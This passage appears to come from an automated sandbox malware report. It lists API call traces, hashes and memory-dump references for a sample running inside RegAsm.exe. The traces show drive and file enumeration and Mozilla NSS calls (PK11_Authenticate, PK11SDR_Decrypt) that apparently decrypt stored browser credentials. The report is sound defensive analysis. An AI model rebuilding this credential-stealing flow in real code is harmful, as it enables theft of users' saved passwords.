                                                                                  • Part of subcall function 00415843: _EH_prolog.MSVCRT ref: 00415848
                                                                                  • Part of subcall function 00415843: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                  • Part of subcall function 00415843: memset.MSVCRT ref: 004158C9
                                                                                  • Part of subcall function 00415843: GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                  • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                  • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                  • Part of subcall function 00415843: lstrlenA.KERNEL32(?), ref: 00415998
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                • String ID:
                                                                                • API String ID: 373919974-0
                                                                                • Opcode ID: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                • Instruction ID: 6a8f297f6f97b9a3cf0514685df13ca52355f4dbaeb7c4ae4b28d527b4ace486
                                                                                • Opcode Fuzzy Hash: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                • Instruction Fuzzy Hash: 5E01C031C00249DBCF20EBA8C9827EEBBB0EF40354F10411AE854A3281C7385B84C7D6
                                                                                APIs
                                                                                • SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPathlstrcpy
                                                                                • String ID:
                                                                                • API String ID: 1699248803-0
                                                                                • Opcode ID: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                • Instruction ID: 14537dfbc9dced5e712fe60e3e3a31c8263f1f5987e60415cd97e08317604fbc
                                                                                • Opcode Fuzzy Hash: 83e6cc5221987d8d92d423f576c0c857877c6fa4a6664693c3a0d08b49ab16c4
                                                                                • Instruction Fuzzy Hash: 27F01C7990014CBBDB51DB64C8909EDB7FDEBC4704F0091A6A90593280D6349F459B50
                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID:
                                                                                • API String ID: 3494564517-0
                                                                                • Opcode ID: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                • Instruction ID: 7dcd19726911a1004ec6e1e6dff555a45da34f101be8258439f6e1c6d27db954
                                                                                • Opcode Fuzzy Hash: 0ae6c29a3e0a6eb9c824dd13ba767ccc85b4e312debc44e2b21ad53b1228ad09
                                                                                • Instruction Fuzzy Hash: AAF05C35601610DB871209599C00AE7775BABC6B10708411BDE8C8B304C5B0ECC142E0
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C7C64DF
                                                                                • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C7C64F2
                                                                                • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C7C6505
                                                                                • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C7C6518
                                                                                • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C7C652B
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C7C671C
                                                                                • GetCurrentProcess.KERNEL32 ref: 6C7C6724
                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C7C672F
                                                                                • GetCurrentProcess.KERNEL32 ref: 6C7C6759
                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C7C6764
                                                                                • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C7C6A80
                                                                                • GetSystemInfo.KERNEL32(?), ref: 6C7C6ABE
                                                                                • __Init_thread_footer.LIBCMT ref: 6C7C6AD3
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7C6AE8
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7C6AF7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                • API String ID: 487479824-2878602165
                                                                                • Opcode ID: 25675f80ad720d3522ae76ac0f820d4c0d1318205ed47000b52d803121b6e871
                                                                                • Instruction ID: 3402a34a43391dead3ebe19d5ec8d5b21062ef31fb0d0ff38519cfe5b26e2969
                                                                                • Opcode Fuzzy Hash: 25675f80ad720d3522ae76ac0f820d4c0d1318205ed47000b52d803121b6e871
                                                                                • Instruction Fuzzy Hash: BCF1F870A0562A9FDB30CF64CE887AAB7B4AF45318F1445A9D809A7741D731AF84CF92
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415E6B
                                                                                • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                • wsprintfA.USER32 ref: 00415EA2
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                • StrCmpCA.SHLWAPI(?,004268EC), ref: 00415ED6
                                                                                • StrCmpCA.SHLWAPI(?,004268F0), ref: 00415EF0
                                                                                • wsprintfA.USER32 ref: 00415F14
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00412DD7: _EH_prolog.MSVCRT ref: 00412DDC
                                                                                  • Part of subcall function 00412DD7: memset.MSVCRT ref: 00412DFD
                                                                                  • Part of subcall function 00412DD7: memset.MSVCRT ref: 00412E0B
                                                                                  • Part of subcall function 00412DD7: lstrcat.KERNEL32(?,00000000), ref: 00412E37
                                                                                  • Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E55
                                                                                  • Part of subcall function 00412DD7: lstrcat.KERNEL32(?,?), ref: 00412E69
                                                                                  • Part of subcall function 00412DD7: lstrcat.KERNEL32(?), ref: 00412E7C
                                                                                  • Part of subcall function 00412DD7: StrStrA.SHLWAPI(00000000), ref: 00412F16
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00416043
                                                                                • FindClose.KERNEL32(00000000), ref: 00416052
                                                                                • lstrcat.KERNEL32(?,?), ref: 00416077
                                                                                • lstrcat.KERNEL32(?), ref: 0041608A
                                                                                • lstrlenA.KERNEL32(?), ref: 00416093
                                                                                • lstrlenA.KERNEL32(?), ref: 004160A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                • String ID: %s\%s$%s\*
                                                                                • API String ID: 398052587-2848263008
                                                                                • Opcode ID: 1bcb0b38f1a17cb0672a22c6c26888d8bc869176a42e8f65a2590460e48f2c2c
                                                                                • Instruction ID: e4a2cc813173545a5fe5718903611597e3c30fccfebff89f3e167d8ce9cdb46d
                                                                                • Opcode Fuzzy Hash: 1bcb0b38f1a17cb0672a22c6c26888d8bc869176a42e8f65a2590460e48f2c2c
                                                                                • Instruction Fuzzy Hash: DB817A71D00259AFDF10EBE4DD49BEEBBB8AF19308F00407AF509A3191DB789648CB65
                                                                                APIs
                                                                                  • Part of subcall function 6C93C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C93DAE2,?), ref: 6C93C6C2
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C93F0AE
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C93F0C8
                                                                                • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C93F101
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C93F11D
                                                                                • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CA0218C), ref: 6C93F183
                                                                                • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C93F19A
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C93F1CB
                                                                                • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C93F1EF
                                                                                • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C93F210
                                                                                  • Part of subcall function 6C8E52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C93F1E9,?,00000000,?,?), ref: 6C8E52F5
                                                                                  • Part of subcall function 6C8E52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C8E530F
                                                                                  • Part of subcall function 6C8E52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C8E5326
                                                                                  • Part of subcall function 6C8E52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C93F1E9,?,00000000,?,?), ref: 6C8E5340
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C93F227
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C93F23E
                                                                                  • Part of subcall function 6C92BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C8DE708,00000000,00000000,00000004,00000000), ref: 6C92BE6A
                                                                                  • Part of subcall function 6C92BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C8E04DC,?), ref: 6C92BE7E
                                                                                  • Part of subcall function 6C92BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C92BEC2
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C93F2BB
                                                                                • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C93F3A8
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C93F3B3
                                                                                  • Part of subcall function 6C8E2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C8E2D3C
                                                                                  • Part of subcall function 6C8E2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C8E2D5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                • String ID:
                                                                                • API String ID: 1559028977-0
                                                                                • Opcode ID: bc7e086a7591fd9ba06711dbbd7defbd89b08df7a616ba6e7aaeb15fe64f98f0
                                                                                • Instruction ID: db1d7fc64f32bde3bf60473e9a938ac71ce052ae605f558657b80a0a94aae783
                                                                                • Opcode Fuzzy Hash: bc7e086a7591fd9ba06711dbbd7defbd89b08df7a616ba6e7aaeb15fe64f98f0
                                                                                • Instruction Fuzzy Hash: 7ED1A0B6E012259FDB14CF99D880A9EB7F9EF5830CF148069E919ABB11E731E805CB50
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040A986
                                                                                • wsprintfA.USER32 ref: 0040A9AF
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
                                                                                • StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040A9E3
                                                                                • StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040A9FD
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AAAD
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040AF44
                                                                                • FindClose.KERNEL32(00000000), ref: 0040AF53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
                                                                                • String ID: #$%s\*.*
                                                                                • API String ID: 1095930517-2760317471
                                                                                • Opcode ID: f57dbc4b3c42bfcb8d2e40b16b3aac21894dd785c7ae38fd2cd95bc549fe5d80
                                                                                • Instruction ID: a122975dc251b7c6bf4e58e1bde1a9732a5f2d9225262cdb85f580827bdd3275
                                                                                • Opcode Fuzzy Hash: f57dbc4b3c42bfcb8d2e40b16b3aac21894dd785c7ae38fd2cd95bc549fe5d80
                                                                                • Instruction Fuzzy Hash: 9E027D70904248EACB15EBE5C856BDEBB78AF19304F4040BEE509B35C2DB785B4DCB66
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD4F2
                                                                                • LeaveCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD50B
                                                                                  • Part of subcall function 6C7BCFE0: EnterCriticalSection.KERNEL32(6C83E784), ref: 6C7BCFF6
                                                                                  • Part of subcall function 6C7BCFE0: LeaveCriticalSection.KERNEL32(6C83E784), ref: 6C7BD026
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD52E
                                                                                • EnterCriticalSection.KERNEL32(6C83E7DC), ref: 6C7DD690
                                                                                • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C7DD6A6
                                                                                • LeaveCriticalSection.KERNEL32(6C83E7DC), ref: 6C7DD712
                                                                                • LeaveCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD751
                                                                                • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C7DD7EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                • API String ID: 2690322072-3894294050
                                                                                • Opcode ID: fc2ab11335203211ea8fc1eea767a9dad6e31eb9df8c4fe0bcddd1c4f2d9940f
                                                                                • Instruction ID: b18b44d365d3aecb922f0c73c1f4c490bac24ca5411fd836bc80b1c1bcb180d5
                                                                                • Opcode Fuzzy Hash: fc2ab11335203211ea8fc1eea767a9dad6e31eb9df8c4fe0bcddd1c4f2d9940f
                                                                                • Instruction Fuzzy Hash: AF91D271A047018FD724CF78C69472AB7E1EB99318F16993EE49A87A81D730A844CFA5
                                                                                APIs
                                                                                • PK11_PubDeriveWithKDF.NSS3 ref: 6C900F8D
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C900FB3
                                                                                • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C901006
                                                                                • PK11_FreeSymKey.NSS3(?), ref: 6C90101C
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C901033
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C90103F
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6C901048
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C90108E
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C9010BB
                                                                                • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C9010D6
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C90112E
                                                                                  • Part of subcall function 6C901570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C9008C4,?,?), ref: 6C9015B8
                                                                                  • Part of subcall function 6C901570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C9008C4,?,?), ref: 6C9015C1
                                                                                  • Part of subcall function 6C901570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90162E
                                                                                  • Part of subcall function 6C901570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C901637
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                • String ID:
                                                                                • API String ID: 1510409361-0
                                                                                • Opcode ID: f3d100510ffff74cf9cc8c11469e317e12e2d5eeffd1af58ba2e2ea685fbb4f9
                                                                                • Instruction ID: f12ad2c53cc2b9f39c6a2dd4f32ed78e14f34ffd3c7359f5898b99befcb1244d
                                                                                • Opcode Fuzzy Hash: f3d100510ffff74cf9cc8c11469e317e12e2d5eeffd1af58ba2e2ea685fbb4f9
                                                                                • Instruction Fuzzy Hash: 5F71EFB5A04205CFDB04CFA9DC81A6AB7B8FF5A31CF14862CE95997B11E731D954CB80
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C8D1C6F,00000000,00000004,?,?), ref: 6C926C3F
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C8D1C6F,00000000,00000004,?,?), ref: 6C926C60
                                                                                • PR_ExplodeTime.NSS3(00000000,6C8D1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C8D1C6F,00000000,00000004,?,?), ref: 6C926C94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                • API String ID: 3534712800-180463219
                                                                                • Opcode ID: b106b1d196c7bbef90e3e8980b1ab7eba61b390a01748c34a1e539d5e4c7c324
                                                                                • Instruction ID: 740a9779eb1216a1facd72d9962d7b1f6cc8ff0a2f1a30f22de38f570e04679d
                                                                                • Opcode Fuzzy Hash: b106b1d196c7bbef90e3e8980b1ab7eba61b390a01748c34a1e539d5e4c7c324
                                                                                • Instruction Fuzzy Hash: 96516A72B116494FC718CDADDC526DABBDAABA4310F48C23AE842CBB85D638D906C751
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00408305
                                                                                • lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
                                                                                • CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
                                                                                • PK11_GetInternalKeySlot.NSS3(?,0040860A,00000014), ref: 00408337
                                                                                • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040860A,00000014), ref: 0040834C
                                                                                • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00408377
                                                                                • memcpy.MSVCRT ref: 00408391
                                                                                • lstrcat.KERNEL32(00425BDF,00425BE3), ref: 004083B8
                                                                                • PK11_FreeSlot.NSS3(?), ref: 004083C1
                                                                                • lstrcat.KERNEL32(00425BDF,00425BE6), ref: 004083D0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
